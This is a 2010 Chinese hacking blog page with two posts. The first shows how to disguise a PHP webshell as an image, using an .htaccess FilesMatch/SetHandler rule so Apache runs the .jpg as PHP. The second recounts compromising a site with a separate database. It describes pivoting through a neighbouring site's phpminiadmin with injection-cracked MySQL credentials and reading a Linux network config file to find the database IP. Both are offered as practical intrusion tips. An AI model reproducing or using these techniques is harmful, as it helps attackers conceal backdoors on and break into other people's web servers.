另类隐藏PHP木马的方法

By Sweet, on 02月 2nd, 2010%

运行环境:Linux + apache  将php木马后缀改成图片类后缀,然后在木马目录或其根目录创建一个.htaccess文件(或在原有的.htaccess文件中加入)  <FilesMatch “文件名”>  SetHandler application/x-httpd-php  </FilesMatch> 例:1.jpg  <FilesMatch “1.jpg”>  SetHandler application/x-httpd-php  </FilesMatch>

Leave a comment   电脑技术, 网络安全

PHP站数据库和WEB分离的入侵思路

By Sweet, on 02月 2nd, 2010%
前段时间搞个站,web和库分离。一直搞不定,经akens提示现在已经搞定了。 
现在说下思路: 
搞数据库和web分离的站一般从后台入手。我那个站后台可能限制了ip,所以这条路不通。 
没办法只要旁注,发现有个站安装了phpminiadmin,地址为xxx.com/mysql.php,需要填帐号和密码以及数据库ip,当初通过注入mysql帐号和密码已经破解。就是不知道数据库ip是多少,后来经提示读取etc/sysconfig/network-scripts/ifcfg-eth1,里面有个IPADDR=x.x.x.x填上ip即可 
我当初也读取了这个ip。但这个ip是内网ip,一直没想着去试。 
另外发一些读取linux敏感数据的路径吧 
Continue reading PHP站数据库和WEB分离的入侵思路
Leave a comment   电脑技术, 网络安全

日历

2010-02月
« Jan   Mar »
1234567
891011121314
15161718192021
22232425262728

文章索引